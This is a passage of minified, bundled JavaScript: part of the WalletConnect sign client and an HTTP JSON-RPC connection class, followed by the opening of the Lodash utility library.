    async isValidSessionOrPairingTopic(r) {
        if (this.client.session.keys.includes(r)) await this.isValidSessionTopic(r);
        else if (this.client.core.pairing.pairings.keys.includes(r)) this.isValidPairingTopic(r);
        else if ((0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(r, !1)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `session or pairing topic doesn't exist: ${r}`);
            throw new Error(e);
        } else {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `session or pairing topic should be a string: ${r}`);
            throw new Error(e);
        }
    }
    async isValidProposalId(r) {
        if (!(0, $a5d33cfc7f8e5437$export$53551be28ad5e34d)(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `proposal id should be a number: ${r}`);
            throw new Error(e);
        }
        if (!this.client.proposal.keys.includes(r)) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `proposal id doesn't exist: ${r}`);
            throw new Error(e);
        }
        if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.client.proposal.get(r).expiry)) {
            await this.deleteProposal(r);
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `proposal id: ${r}`);
            throw new Error(e);
        }
    }
}
class $4a472e843fedf2e2$var$cs extends (0, $e9e439c110f17033$export$390f32400eaf98c9) {
    constructor(r, e){
        super(r, e, $4a472e843fedf2e2$export$ae6c7a4f7ed730a1, $4a472e843fedf2e2$export$7fa6f9ee1e2cab96), this.core = r, this.logger = e;
    }
}
class $4a472e843fedf2e2$var$ls extends (0, $e9e439c110f17033$export$390f32400eaf98c9) {
    constructor(r, e){
        super(r, e, $4a472e843fedf2e2$export$a069e98a8dfeec1e, $4a472e843fedf2e2$export$7fa6f9ee1e2cab96), this.core = r, this.logger = e;
    }
}
class $4a472e843fedf2e2$var$ps extends (0, $e9e439c110f17033$export$390f32400eaf98c9) {
    constructor(r, e){
        super(r, e, $4a472e843fedf2e2$export$40b296af21bd38a4, $4a472e843fedf2e2$export$7fa6f9ee1e2cab96, (s)=>s.id), this.core = r, this.logger = e;
    }
}
class $4a472e843fedf2e2$export$2e2bcd8739ae039 extends (0, $bace94c1ef08d1bc$export$2ebcf6eeacedad44) {
    constructor(r){
        super(r), this.protocol = $4a472e843fedf2e2$export$4fa962fc67384e02, this.version = $4a472e843fedf2e2$export$61085c48796ff049, this.name = $4a472e843fedf2e2$export$8dffb3242f2c5f72.name, this.events = new (0, $7etJZ.EventEmitter), this.on = (s, t)=>this.events.on(s, t), this.once = (s, t)=>this.events.once(s, t), this.off = (s, t)=>this.events.off(s, t), this.removeListener = (s, t)=>this.events.removeListener(s, t), this.removeAllListeners = (s)=>this.events.removeAllListeners(s), this.connect = async (s)=>{
            try {
                return await this.engine.connect(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.pair = async (s)=>{
            try {
                return await this.engine.pair(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.approve = async (s)=>{
            try {
                return await this.engine.approve(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.reject = async (s)=>{
            try {
                return await this.engine.reject(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.update = async (s)=>{
            try {
                return await this.engine.update(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.extend = async (s)=>{
            try {
                return await this.engine.extend(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.request = async (s)=>{
            try {
                return await this.engine.request(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.respond = async (s)=>{
            try {
                return await this.engine.respond(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.ping = async (s)=>{
            try {
                return await this.engine.ping(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.emit = async (s)=>{
            try {
                return await this.engine.emit(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.disconnect = async (s)=>{
            try {
                return await this.engine.disconnect(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.find = (s)=>{
            try {
                return this.engine.find(s);
            } catch (t) {
                throw this.logger.error(t.message), t;
            }
        }, this.getPendingSessionRequests = ()=>{
            try {
                return this.engine.getPendingSessionRequests();
            } catch (s) {
                throw this.logger.error(s.message), s;
            }
        }, this.name = r?.name || $4a472e843fedf2e2$export$8dffb3242f2c5f72.name, this.metadata = r?.metadata || (0, $a5d33cfc7f8e5437$export$ba31e015127122bb)();
        const e = typeof r?.logger < "u" && typeof r?.logger != "string" ? r.logger : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: r?.logger || $4a472e843fedf2e2$export$8dffb3242f2c5f72.logger
        }));
        this.core = r?.core || new (0, $e9e439c110f17033$export$4143ab5b91744744)(r), this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(e, this.name), this.session = new $4a472e843fedf2e2$var$ls(this.core, this.logger), this.proposal = new $4a472e843fedf2e2$var$cs(this.core, this.logger), this.pendingRequest = new $4a472e843fedf2e2$var$ps(this.core, this.logger), this.engine = new $4a472e843fedf2e2$var$as(this);
    }
    static async init(r) {
        const e = new $4a472e843fedf2e2$export$2e2bcd8739ae039(r);
        return await e.initialize(), e;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get pairing() {
        return this.core.pairing.pairings;
    }
    async initialize() {
        this.logger.trace("Initialized");
        try {
            await this.core.start(), await this.session.init(), await this.proposal.init(), await this.pendingRequest.init(), await this.engine.init(), this.core.verify.init({
                verifyUrl: this.metadata.verifyUrl
            }), this.logger.info("SignClient Initialization Success");
        } catch (r) {
            throw this.logger.info("SignClient Initialization Failure"), this.logger.error(r.message), r;
        }
    }
}
const $4a472e843fedf2e2$export$bdf4ba258ec679dc = $4a472e843fedf2e2$export$2e2bcd8739ae039;





var $7etJZ = parcelRequire("7etJZ");

var $R5nvG = parcelRequire("R5nvG");


const $da1642b2b5d2a2fb$var$DEFAULT_HTTP_HEADERS = {
    Accept: "application/json",
    "Content-Type": "application/json"
};
const $da1642b2b5d2a2fb$var$DEFAULT_HTTP_METHOD = "POST";
const $da1642b2b5d2a2fb$var$DEFAULT_FETCH_OPTS = {
    headers: $da1642b2b5d2a2fb$var$DEFAULT_HTTP_HEADERS,
    method: $da1642b2b5d2a2fb$var$DEFAULT_HTTP_METHOD
};
const $da1642b2b5d2a2fb$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT = 10;
class $da1642b2b5d2a2fb$export$13c1f9cf8a283575 {
    constructor(url, disableProviderPing = false){
        this.url = url;
        this.disableProviderPing = disableProviderPing;
        this.events = new (0, $7etJZ.EventEmitter)();
        this.isAvailable = false;
        this.registering = false;
        if (!(0, $ceb127018999f416$export$206c3129b8bb1b4f)(url)) throw new Error(`Provided URL is not compatible with HTTP connection: ${url}`);
        this.url = url;
        this.disableProviderPing = disableProviderPing;
    }
    get connected() {
        return this.isAvailable;
    }
    get connecting() {
        return this.registering;
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    async open(url = this.url) {
        await this.register(url);
    }
    async close() {
        if (!this.isAvailable) throw new Error("Connection already closed");
        this.onClose();
    }
    async send(payload, context) {
        if (!this.isAvailable) await this.register();
        try {
            const body = (0, $81c2e06d24b89184$export$abc3f407e87918a4)(payload);
            const res = await (0, (/*@__PURE__*/$parcel$interopDefault($R5nvG)))(this.url, Object.assign(Object.assign({}, $da1642b2b5d2a2fb$var$DEFAULT_FETCH_OPTS), {
                body: body
            }));
            const data = await res.json();
            this.onPayload({
                data: data
            });
        } catch (e) {
            this.onError(payload.id, e);
        }
    }
    async register(url = this.url) {
        if (!(0, $ceb127018999f416$export$206c3129b8bb1b4f)(url)) throw new Error(`Provided URL is not compatible with HTTP connection: ${url}`);
        if (this.registering) {
            const currentMaxListeners = this.events.getMaxListeners();
            if (this.events.listenerCount("register_error") >= currentMaxListeners || this.events.listenerCount("open") >= currentMaxListeners) this.events.setMaxListeners(currentMaxListeners + 1);
            return new Promise((resolve, reject)=>{
                this.events.once("register_error", (error)=>{
                    this.resetMaxListeners();
                    reject(error);
                });
                this.events.once("open", ()=>{
                    this.resetMaxListeners();
                    if (typeof this.isAvailable === "undefined") return reject(new Error("HTTP connection is missing or invalid"));
                    resolve();
                });
            });
        }
        this.url = url;
        this.registering = true;
        try {
            if (!this.disableProviderPing) {
                const body = (0, $81c2e06d24b89184$export$abc3f407e87918a4)({
                    id: 1,
                    jsonrpc: "2.0",
                    method: "test",
                    params: []
                });
                await (0, (/*@__PURE__*/$parcel$interopDefault($R5nvG)))(url, Object.assign(Object.assign({}, $da1642b2b5d2a2fb$var$DEFAULT_FETCH_OPTS), {
                    body: body
                }));
            }
            this.onOpen();
        } catch (e) {
            const error = this.parseError(e);
            this.events.emit("register_error", error);
            this.onClose();
            throw error;
        }
    }
    onOpen() {
        this.isAvailable = true;
        this.registering = false;
        this.events.emit("open");
    }
    onClose() {
        this.isAvailable = false;
        this.registering = false;
        this.events.emit("close");
    }
    onPayload(e) {
        if (typeof e.data === "undefined") return;
        const payload = typeof e.data === "string" ? (0, $81c2e06d24b89184$export$84137bb44359aed5)(e.data) : e.data;
        this.events.emit("payload", payload);
    }
    onError(id, e) {
        const error = this.parseError(e);
        const message = error.message || error.toString();
        const payload = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(id, message);
        this.events.emit("payload", payload);
    }
    parseError(e, url = this.url) {
        return (0, $ab82c37acb5ed82a$export$f555d7d8f922e407)(e, url, "HTTP");
    }
    resetMaxListeners() {
        if (this.events.getMaxListeners() > $da1642b2b5d2a2fb$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT) this.events.setMaxListeners($da1642b2b5d2a2fb$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT);
    }
}
var $da1642b2b5d2a2fb$export$2e2bcd8739ae039 = $da1642b2b5d2a2fb$export$13c1f9cf8a283575;


var $9fa154a0253fc04e$export$2e2bcd8739ae039 = (0, $da1642b2b5d2a2fb$export$2e2bcd8739ae039);




var $7etJZ = parcelRequire("7etJZ");
const $253fb4de41dc743b$var$Ca = "error", $253fb4de41dc743b$var$Hg = "wss://relay.walletconnect.com", $253fb4de41dc743b$var$$g = "wc", $253fb4de41dc743b$var$Ug = "universal_provider", $253fb4de41dc743b$var$Ia = `${$253fb4de41dc743b$var$$g}@2:${$253fb4de41dc743b$var$Ug}:`, $253fb4de41dc743b$var$Wg = "https://rpc.walletconnect.com/v1", $253fb4de41dc743b$var$ot = {
    DEFAULT_CHAIN_CHANGED: "default_chain_changed"
};
var $253fb4de41dc743b$var$pe = typeof globalThis < "u" ? globalThis : typeof window < "u" ? window : typeof $parcel$global < "u" ? $parcel$global : typeof self < "u" ? self : {}, $253fb4de41dc743b$var$$i = {
    exports: {}
}; /**
 * @license
 * Lodash <https://lodash.com/>
 * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>
 * Released under MIT license <https://lodash.com/license>
 * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>
 * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
 */ 
(function(C, u) {
    (function() {
        var i, p = "4.17.21", I = 200, D = "Unsupported core-js use. Try https://npms.io/search?q=ponyfill.", F = "Expected a function", Fn = "Invalid `variable` option passed into `_.template`", Gt = "__lodash_hash_undefined__", lr = 500, At = "__lodash_placeholder__", Ln = 1, Mn = 2, Ct = 4, It = 1, de = 2, vn = 1, ft = 2, Mi = 4, Dn = 8, xt = 16, Nn = 32, Et = 64, qn = 128, zt = 256, pr = 512, Ta = 30, La = "...", Da = 800, Na = 16, qi = 1, Ha = 2, $a = 3, ct = 1 / 0, kn = 9007199254740991, Ua = 17976931348623157e292, ge = 0 / 0, Hn = 4294967295, Wa = Hn - 1, Fa = Hn >>> 1, Ma = [
            [
                "ary",
                qn
            ],
            [
                "bind",
                vn
            ],
            [
                "bindKey",
                ft
            ],
            [
                "curry",
                Dn
            ],
            [
                "curryRight",
                xt
            ],
            [
                "flip",
                pr
            ],
            [
                "partial",
                Nn
            ],
            [
                "partialRight",
                Et
            ],
            [
                "rearg",
                zt
            ]
        ], yt = "[object Arguments]", ve = "[object Array]", qa = "[object AsyncFunction]", Kt = "[object Boolean]", Yt = "[object Date]", Ba = "[object DOMException]", _e = "[object Error]", me = "[object Function]", Bi = "[object GeneratorFunction]", yn = "[object Map]", Zt = "[object Number]", Ga = "[object Null]", Bn = "[object Object]", Gi = "[object Promise]", za = "[object Proxy]", Jt = "[object RegExp]", Sn = "[object Set]", Xt = "[object String]", we = "[object Symbol]", Ka = "[object Undefined]", Qt = "[object WeakMap]", Ya = "[object WeakSet]", Vt = "[object ArrayBuffer]", St = "[object DataView]", dr = "[object Float32Array]", gr = "[object Float64Array]", vr = "[object Int8Array]", _r = "[object Int16Array]", mr = "[object Int32Array]", wr = "[object Uint8Array]", Pr = "[object Uint8ClampedArray]", Ar = "[object Uint16Array]", Cr = "[object Uint32Array]", Za = /\b__p \+= '';/g, Ja = /\b(__p \+=) '' \+/g, Xa = /(__e\(.*?\)|\b__t\)) \+\n'';/g, zi = /&(?:amp|lt|gt|quot|#39);/g, Ki = /[&<>"']/g, Qa = RegExp(zi.source), Va = RegExp(Ki.source), ka = /<%-([\s\S]+?)%>/g, ja = /<%([\s\S]+?)%>/g, Yi = /<%=([\s\S]+?)%>/g, no = /\.|\[(?:[^[\]]*|(["'])(?:(?!\1)[^\\]|\\.)*?\1)\]/, to = /^\w*$/, eo = /[^.[\]]+|\[(?:(-?\d+(?:\.\d+)?)|(["'])((?:(?!\2)[^\\]|\\.)*?)\2)\]|(?=(?:\.|\[\])(?:\.|\[\]|$))/g, Ir = /[\\^$.*+?()[\]{}|]/g, ro = RegExp(Ir.source), xr = /^\s+/, io = /\s/, so = /\{(?:\n\/\* \[wrapped with .+\] \*\/)?\n?/, uo = /\{\n\/\* \[wrapped with (.+)\] \*/, ao = /,? & /, oo = /[^\x00-\x2f\x3a-\x40\x5b-\x60\x7b-\x7f]+/g, fo = /[()=,{}\[\]\/\s]/, co = /\\(\\)?/g, ho = /\$\{([^\\}]*(?:\\.[^\\}]*)*)\}/g, Zi = /\w*$/, lo = /^[-+]0x[0-9a-f]+$/i, po = /^0b[01]+$/i, go = /^\[object .+?Constructor\]$/, vo = /^0o[0-7]+$/i, _o = /^(?:0|[1-9]\d*)$/, mo = /[\xc0-\xd6\xd8-\xf6\xf8-\xff\u0100-\u017f]/g, Pe = /($^)/, wo = /['\n\r\u2028\u2029\\]/g, Ae = "\ud800-\udfff", Po = "\\u0300-\\u036f", Ao = "\\ufe20-\\ufe2f", Co = "\\u20d0-\\u20ff", Ji = Po + Ao + Co, Xi = "\\u2700-\\u27bf", Qi = "a-z\\xdf-\\xf6\\xf8-\\xff", Io = "\\xac\\xb1\\xd7\\xf7", xo = "\\x00-\\x2f\\x3a-\\x40\\x5b-\\x60\\x7b-\\xbf", Eo = "\\u2000-\\u206f", yo = " \\t\\x0b\\f\\xa0\\ufeff\\n\\r\\u2028\\u2029\\u1680\\u180e\\u2000\\u2001\\u2002\\u2003\\u2004\\u2005\\u2006\\u2007\\u2008\\u2009\\u200a\\u202f\\u205f\\u3000", Vi = "A-Z\\xc0-\\xd6\\xd8-\\xde", ki = "\\ufe0e\\ufe0f", ji = Io + xo + Eo + yo, Er = "['’]", So = "[" + Ae + "]", ns = "[" + ji + "]", Ce = "[" + Ji + "]", ts = "\\d+", Oo = "[" + Xi + "]", es = "[" + Qi + "]", rs = "[^" + Ae + ji + ts + Xi + Qi + Vi + "]", yr = "\ud83c[\udffb-\udfff]", Ro = "(?:" + Ce + "|" + yr + ")", is = "[^" + Ae + "]", Sr = "(?:\ud83c[\udde6-\uddff]){2}", Or = "[\ud800-\udbff][\udc00-\udfff]", Ot = "[" + Vi + "]", ss = "\\u200d", us = "(?:" + es + "|" + rs + ")", bo = "(?:" + Ot + "|" + rs + ")", as = "(?:" + Er + "(?:d|ll|m|re|s|t|ve))?", os = "(?:" + Er + "(?:D|LL|M|RE|S|T|VE))?", fs = Ro + "?", cs = "[" + ki + "]?", To = "(?:" + ss + "(?:" + [
            is,
            Sr,
            Or
        ].join("|") + ")" + cs + fs + ")*", Lo = "\\d*(?:1st|2nd|3rd|(?![123])\\dth)(?=\\b|[A-Z_])", Do = "\\d*(?:1ST|2ND|3RD|(?![123])\\dTH)(?=\\b|[a-z_])", hs = cs + fs + To, No = "(?:" + [
            Oo,
            Sr,
            Or
        ].join("|") + ")" + hs, Ho = "(?:" + [
            is + Ce + "?",
            Ce,
            Sr,
            Or,
            So
        ].join("|") + ")", $o = RegExp(Er, "g"), Uo = RegExp(Ce, "g"), Rr = RegExp(yr + "(?=" + yr + ")|" + Ho + hs, "g"), Wo = RegExp([
            Ot + "?" + es + "+" + as + "(?=" + [
                ns,
                Ot,
                "$"
            ].join("|") + ")",
            bo + "+" + os + "(?=" + [
                ns,
                Ot + us,
                "$"
            ].join("|") + ")",
            Ot + "?" + us + "+" + as,
            Ot + "+" + os,
            Do,
            Lo,
            ts,
            No
        ].join("|"), "g"), Fo = RegExp("[" + ss + Ae + Ji + ki + "]"), Mo = /[a-z][A-Z]|[A-Z]{2}[a-z]|[0-9][a-zA-Z]|[a-zA-Z][0-9]|[^a-zA-Z0-9 ]/, qo = [
            "Array",
            "Buffer",
            "DataView",
            "Date",
            "Error",
            "Float32Array",
            "Float64Array",
            "Function",
            "Int8Array",
            "Int16Array",
            "Int32Array",
            "Map",
            "Math",
            "Object",
            "Promise",
            "RegExp",
            "Set",
            "String",
            "Symbol",
            "TypeError",
            "Uint8Array",
            "Uint8ClampedArray",
            "Uint16Array",
            "Uint32Array",
            "WeakMap",
            "_",
            "clearTimeout",
            "isFinite",
            "parseInt",
            "setTimeout"
        ], Bo = -1, B = {};
        B[dr] = B[gr] = B[vr] = B[_r] = B[mr] = B[wr] = B[Pr] = B[Ar] = B[Cr] = !0, B[yt] = B[ve] = B[Vt] = B[Kt] = B[St] = B[Yt] = B[_e] = B[me] = B[yn] = B[Zt] = B[Bn] = B[Jt] = B[Sn] = B[Xt] = B[Qt] = !1;
        var q = {};
        q[yt] = q[ve] = q[Vt] = q[St] = q[Kt] = q[Yt] = q[dr] = q[gr] = q[vr] = q[_r] = q[mr] = q[yn] = q[Zt] = q[Bn] = q[Jt] = q[Sn] = q[Xt] = q[we] = q[wr] = q[Pr] = q[Ar] = q[Cr] = !0, q[_e] = q[me] = q[Qt] = !1;
        var Go = {
            À: "A",
            Á: "A",
            Â: "A",
            Ã: "A",
            Ä: "A",
            Å: "A",
            à: "a",
            á: "a",
            â: "a",
            ã: "a",
            ä: "a",
            å: "a",
            Ç: "C",
            ç: "c",
            Ð: "D",
            ð: "d",
            È: "E",
            É: "E",
            Ê: "E",
            Ë: "E",
            è: "e",
            é: "e",
            ê: "e",
            ë: "e",
            Ì: "I",
            Í: "I",
            Î: "I",
            Ï: "I",
            ì: "i",
            í: "i",
            î: "i",
            ï: "i",
            Ñ: "N",
            ñ: "n",
            Ò: "O",
            Ó: "O",
            Ô: "O",
            Õ: "O",
            Ö: "O",
            Ø: "O",
            ò: "o",
            ó: "o",
            ô: "o",
            õ: "o",
            ö: "o",
            ø: "o",
            Ù: "U",
            Ú: "U",
            Û: "U",
            Ü: "U",
            ù: "u",
            ú: "u",
            û: "u",
            ü: "u",
            Ý: "Y",
            ý: "y",
            ÿ: "y",
            Æ: "Ae",
            æ: "ae",
            Þ: "Th",
            þ: "th",
            ß: "ss",
            Ā: "A",
            Ă: "A",
            Ą: "A",
            ā: "a",
            ă: "a",
            ą: "a",
            Ć: "C",
            Ĉ: "C",
            Ċ: "C",
            Č: "C",
            ć: "c",
            ĉ: "c",
            ċ: "c",
            č: "c",
            Ď: "D",
            Đ: "D",
            ď: "d",
            đ: "d",
            Ē: "E",
            Ĕ: "E",
            Ė: "E",
            Ę: "E",
            Ě: "E",
            ē: "e",
            ĕ: "e",
            ė: "e",
            ę: "e",
            ě: "e",
            Ĝ: "G",
            Ğ: "G",
            Ġ: "G",
            Ģ: "G",
            ĝ: "g",
            ğ: "g",
            ġ: "g",
            ģ: "g",
            Ĥ: "H",
            Ħ: "H",
            ĥ: "h",
            ħ: "h",
            Ĩ: "I",
            Ī: "I",
            Ĭ: "I",
            Į: "I",
            İ: "I",
            ĩ: "i",
            ī: "i",
            ĭ: "i",
            į: "i",
            ı: "i",
            Ĵ: "J",
            ĵ: "j",
            Ķ: "K",
            ķ: "k",
            ĸ: "k",
            Ĺ: "L",
            Ļ: "L",
            Ľ: "L",
            Ŀ: "L",
            Ł: "L",
            ĺ: "l",
            ļ: "l",
            ľ: "l",
            ŀ: "l",
            ł: "l",
            Ń: "N",
            Ņ: "N",
            Ň: "N",
            Ŋ: "N",
            ń: "n",
            ņ: "n",
            ň: "n",
            ŋ: "n",
            Ō: "O",
            Ŏ: "O",
            Ő: "O",
            ō: "o",
            ŏ: "o",
            ő: "o",
            Ŕ: "R",
            Ŗ: "R",
            Ř: "R",
            ŕ: "r",
            ŗ: "r",
            ř: "r",
            Ś: "S",
            Ŝ: "S",
            Ş: "S",
            Š: "S",
            ś: "s",
            ŝ: "s",
            ş: "s",
            š: "s",
            Ţ: "T",
            Ť: "T",
            Ŧ: "T",
            ţ: "t",
            ť: "t",
            ŧ: "t",
            Ũ: "U",
            Ū: "U",
            Ŭ: "U",
            Ů: "U",
            Ű: "U",
            Ų: "U",
            ũ: "u",
            ū: "u",
            ŭ: "u",
            ů: "u",
            ű: "u",
            ų: "u",
            Ŵ: "W",
            ŵ: "w",
            Ŷ: "Y",
            ŷ: "y",
            Ÿ: "Y",
            Ź: "Z",
            Ż: "Z",
            Ž: "Z",
            ź: "z",
            ż: "z",
            ž: "z",
            Ĳ: "IJ",
            ĳ: "ij",
            Œ: "Oe",
            œ: "oe",
            ŉ: "'n",
            ſ: "s"
        }, zo = {
            "&": "&amp;",
            "<": "&lt;",
            ">": "&gt;",
            '"': "&quot;",
            "'": "&#39;"
        }, Ko = {
            "&amp;": "&",
            "&lt;": "<",
            "&gt;": ">",
            "&quot;": '"',
            "&#39;": "'"
        }, Yo = {
            "\\": "\\",
            "'": "'",
            "\n": "n",
            "\r": "r",
            "\u2028": "u2028",
            "\u2029": "u2029"
        }, Zo = parseFloat, Jo = parseInt, ls = typeof $253fb4de41dc743b$var$pe == "object" && $253fb4de41dc743b$var$pe && $253fb4de41dc743b$var$pe.Object === Object && $253fb4de41dc743b$var$pe, Xo = typeof self == "object" && self && self.Object === Object && self, k = ls || Xo || Function("return this")(), br = u && !u.nodeType && u, ht = br && !0 && C && !C.nodeType && C, ps = ht && ht.exports === br, Tr = ps && ls.process, _n = function() {
            try {
                var h = ht && ht.require && ht.require("util").types;
                return h || Tr && Tr.binding && Tr.binding("util");
            } catch  {}
        }(), ds = _n && _n.isArrayBuffer, gs = _n && _n.isDate, vs = _n && _n.isMap, _s = _n && _n.isRegExp, ms = _n && _n.isSet, ws = _n && _n.isTypedArray;
        function cn(h, g, d) {
            switch(d.length){
                case 0:
                    return h.call(g);
                case 1:
                    return h.call(g, d[0]);
                case 2:
                    return h.call(g, d[0], d[1]);
                case 3:
                    return h.call(g, d[0], d[1], d[2]);
            }
            return h.apply(g, d);
        }
        function Qo(h, g, d, P) {
            for(var S = -1, $ = h == null ? 0 : h.length; ++S < $;){
                var X = h[S];
                g(P, X, d(X), h);
            }
            return P;
        }
        function mn(h, g) {
            for(var d = -1, P = h == null ? 0 : h.length; ++d < P && g(h[d], d, h) !== !1;);
            return h;
        }
        function Vo(h, g) {
            for(var d = h == null ? 0 : h.length; d-- && g(h[d], d, h) !== !1;);
            return h;
        }
        function Ps(h, g) {
            for(var d = -1, P = h == null ? 0 : h.length; ++d < P;)if (!g(h[d], d, h)) return !1;
            return !0;
        }
        function jn(h, g) {
            for(var d = -1, P = h == null ? 0 : h.length, S = 0, $ = []; ++d < P;){
                var X = h[d];
                g(X, d, h) && ($[S++] = X);
            }
            return $;
        }
        function Ie(h, g) {
            var d = h == null ? 0 : h.length;
            return !!d && Rt(h, g, 0) > -1;
        }
        function Lr(h, g, d) {
            for(var P = -1, S = h == null ? 0 : h.length; ++P < S;)if (d(g, h[P])) return !0;
            return !1;
        }
        function G(h, g) {
            for(var d = -1, P = h == null ? 0 : h.length, S = Array(P); ++d < P;)S[d] = g(h[d], d, h);
            return S;
        }
        function nt(h, g) {
            for(var d = -1, P = g.length, S = h.length; ++d < P;)h[S + d] = g[d];
            return h;
        }
        function Dr(h, g, d, P) {
            var S = -1, $ = h == null ? 0 : h.length;
            for(P && $ && (d = h[++S]); ++S < $;)d = g(d, h[S], S, h);
            return d;
        }
        function ko(h, g, d, P) {
            var S = h == null ? 0 : h.length;
            for(P && S && (d = h[--S]); S--;)d = g(d, h[S], S, h);
            return d;
        }
        function Nr(h, g) {
            for(var d = -1, P = h == null ? 0 : h.length; ++d < P;)if (g(h[d], d, h)) return !0;
            return !1;
        }
        var jo = Hr("length");
        function nf(h) {
            return h.split("");
        }
        function tf(h) {
            return h.match(oo) || [];
        }
        function As(h, g, d) {
            var P;
            return d(h, function(S, $, X) {
                if (g(S, $, X)) return P = $, !1;
            }), P;
        }
        function xe(h, g, d, P) {
            for(var S = h.length, $ = d + (P ? 1 : -1); P ? $-- : ++$ < S;)if (g(h[$], $, h)) return $;
            return -1;
        }
        function Rt(h, g, d) {
            return g === g ? df(h, g, d) : xe(h, Cs, d);
        }
        function ef(h, g, d, P) {
            for(var S = d - 1, $ = h.length; ++S < $;)if (P(h[S], g)) return S;
            return -1;
        }
        function Cs(h) {
            return h !== h;
        }
        function Is(h, g) {
            var d = h == null ? 0 : h.length;
            return d ? Ur(h, g) / d : ge;
        }
        function Hr(h) {
            return function(g) {
                return g == null ? i : g[h];
            };
        }
        function $r(h) {
            return function(g) {
                return h == null ? i : h[g];
            };
        }
        function xs(h, g, d, P, S) {
            return S(h, function($, X, M) {
                d = P ? (P = !1, $) : g(d, $, X, M);
            }), d;
        }
        function rf(h, g) {
            var d = h.length;
            for(h.sort(g); d--;)h[d] = h[d].value;
            return h;
        }
        function Ur(h, g) {
            for(var d, P = -1, S = h.length; ++P < S;){
                var $ = g(h[P]);
                $ !== i && (d = d === i ? $ : d + $);
            }
            return d;
        }
        function Wr(h, g) {
            for(var d = -1, P = Array(h); ++d < h;)P[d] = g(d);
            return P;
        }
        function sf(h, g) {
            return G(g, function(d) {
                return [
                    d,
                    h[d]
                ];
            });
        }
        function Es(h) {
            return h && h.slice(0, Rs(h) + 1).replace(xr, "");
        }
        function hn(h) {
            return function(g) {
                return h(g);
            };
        }
        function Fr(h, g) {
            return G(g, function(d) {
                return h[d];
            });
        }
        function kt(h, g) {
            return h.has(g);
        }
        function ys(h, g) {
            for(var d = -1, P = h.length; ++d < P && Rt(g, h[d], 0) > -1;);
            return d;
        }
        function Ss(h, g) {
            for(var d = h.length; d-- && Rt(g, h[d], 0) > -1;);
            return d;
        }
        function uf(h, g) {
            for(var d = h.length, P = 0; d--;)h[d] === g && ++P;
            return P;
        }
        var af = $r(Go), of = $r(zo);
        function ff(h) {
            return "\\" + Yo[h];
        }
        function cf(h, g) {
            return h == null ? i : h[g];
        }
        function bt(h) {
            return Fo.test(h);
        }
        function hf(h) {
            return Mo.test(h);
        }
        function lf(h) {
            for(var g, d = []; !(g = h.next()).done;)d.push(g.value);
            return d;
        }
        function Mr(h) {
            var g = -1, d = Array(h.size);
            return h.forEach(function(P, S) {
                d[++g] = [
                    S,
                    P
                ];
            }), d;
        }
        function Os(h, g) {
            return function(d) {
                return h(g(d));
            };
        }
        function tt(h, g) {
            for(var d = -1, P = h.length, S = 0, $ = []; ++d < P;){
                var X = h[d];
                (X === g || X === At) && (h[d] = At, $[S++] = d);
            }
            return $;
        }
        function Ee(h) {
            var g = -1, d = Array(h.size);
            return h.forEach(function(P) {
                d[++g] = P;
            }), d;
        }
        function pf(h) {
            var g = -1, d = Array(h.size);
            return h.forEach(function(P) {
                d[++g] = [
                    P,
                    P
                ];
            }), d;
        }
        function df(h, g, d) {
            for(var P = d - 1, S = h.length; ++P < S;)if (h[P] === g) return P;
            return -1;
        }
        function gf(h, g, d) {
            for(var P = d + 1; P--;)if (h[P] === g) return P;
            return P;
        }
        function Tt(h) {
            return bt(h) ? _f(h) : jo(h);
        }
        function On(h) {
            return bt(h) ? mf(h) : nf(h);
        }
        function Rs(h) {
            for(var g = h.length; g-- && io.test(h.charAt(g)););
            return g;
        }
        var vf = $r(Ko);
        function _f(h) {
            for(var g = Rr.lastIndex = 0; Rr.test(h);)++g;
            return g;
        }
        function mf(h) {
            return h.match(Rr) || [];
        }
        function wf(h) {
            return h.match(Wo) || [];
        }
        var Pf = function h(g) {
            g = g == null ? k : Lt.defaults(k.Object(), g, Lt.pick(k, qo));
            var d = g.Array, P = g.Date, S = g.Error, $ = g.Function, X = g.Math, M = g.Object, qr = g.RegExp, Af = g.String, wn = g.TypeError, ye = d.prototype, Cf = $.prototype, Dt = M.prototype, Se = g["__core-js_shared__"], Oe = Cf.toString, W = Dt.hasOwnProperty, If = 0, bs = function() {
                var n = /[^.]+$/.exec(Se && Se.keys && Se.keys.IE_PROTO || "");
